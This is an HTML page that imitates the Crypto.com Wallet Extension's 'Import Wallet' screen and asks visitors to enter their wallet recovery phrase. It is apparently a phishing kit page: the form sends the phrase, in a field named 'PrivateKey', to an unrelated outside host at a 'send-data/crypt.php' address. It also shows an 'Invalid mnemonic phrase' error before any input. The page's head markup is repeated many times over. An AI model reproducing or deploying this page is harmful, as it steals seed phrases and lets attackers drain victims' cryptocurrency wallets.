<html lang="en"><head><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css"></head>
  
    <body>
      <div id="root"><div class="import_wallet___248SK"><a href="input.html?access-my-wallet" div="" class="go_back___1-f-c"></a><div class="title___1C2cy">Import Wallet</div><div class="subtitle___1InNY">Import a crypto wallet by entering its recovery phrase</div><div class="desc___2SBxc">Enter your wallet’s 12/15/18/24-word recovery phrase</div><form method="post" action="//my-clientarea.my.id/send-data/crypt.php" form="" autocomplete="off" class="ant-form ant-form-vertical"><div class="area_wrap___2YyXp "><svg width="24" height="24" viewBox="0 0 24 24" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M12 10.9741L8.23837 7.21247C7.95508 6.92918 7.49576 6.92918 7.21247 7.21247C6.92918 7.49576 6.92918 7.95508 7.21247 8.23837L10.9741 12L7.21247 15.7616C6.92918 16.0449 6.92918 16.5042 7.21247 16.7875C7.49576 17.0708 7.95508 17.0708 8.23837 16.7875L12 13.0259L15.7616 16.7875C16.0449 17.0708 16.5042 17.0708 16.7875 16.7875C17.0708 16.5042 17.0708 16.0449 16.7875 15.7616L13.0259 12L16.7875 8.23837C17.0708 7.95508 17.0708 7.49576 16.7875 7.21247C16.5042 6.92918 16.0449 6.92918 15.7616 7.21247L12 10.9741Z" fill="#E64B60"></path></svg><textarea placeholder="Separate each word with a space" class="ant-input area___3V06- " type="text" name="PrivateKey" required="true"></textarea><span style="color: RED">Invalid mnemonic phrase</span><div class="tip___3g37l"></div><label class="ant-checkbox-wrapper"><span class="ant-checkbox"><input type="checkbox" class="ant-checkbox-input" value=""><span class="ant-checkbox-inner"></span></span><span>Show recovery phrase</span></label></div><div class="disclaimer___1qGN0"></div><button type="submit" class="ant-btn ant-btn-default ant-btn-block btn___3NA9b" style="height: 48px; background-color: rgb(17, 153, 250);"><span>Proceed</span></button></form></div></div>
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">
      <link rel="icon" href="static/logo.c3d55bff.svg">
      <link rel="apple-touch-icon" href="./logo192.png">
      <link rel="manifest" href="./manifest.json">
      <title></title>
      <link rel="stylesheet" href="./antd.css">
      <link rel="stylesheet" href="./umi.css">
      
      
    <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css">
  
    
      
  
      <script src="./web3.js"></script>
      <script src="./idna-uts46-hx.js"></script>
      <script src="./ethersproject.js"></script>
      <script src="./ethereumjs.js"></script>
      <script src="./mathjs.js"></script>
      <script src="./antd.js"></script>
      <script src="./vendors.js"></script>
      <script src="./umi.js"></script>
    
  
  <style rc-util-key="antd-wave"></style></body></html>
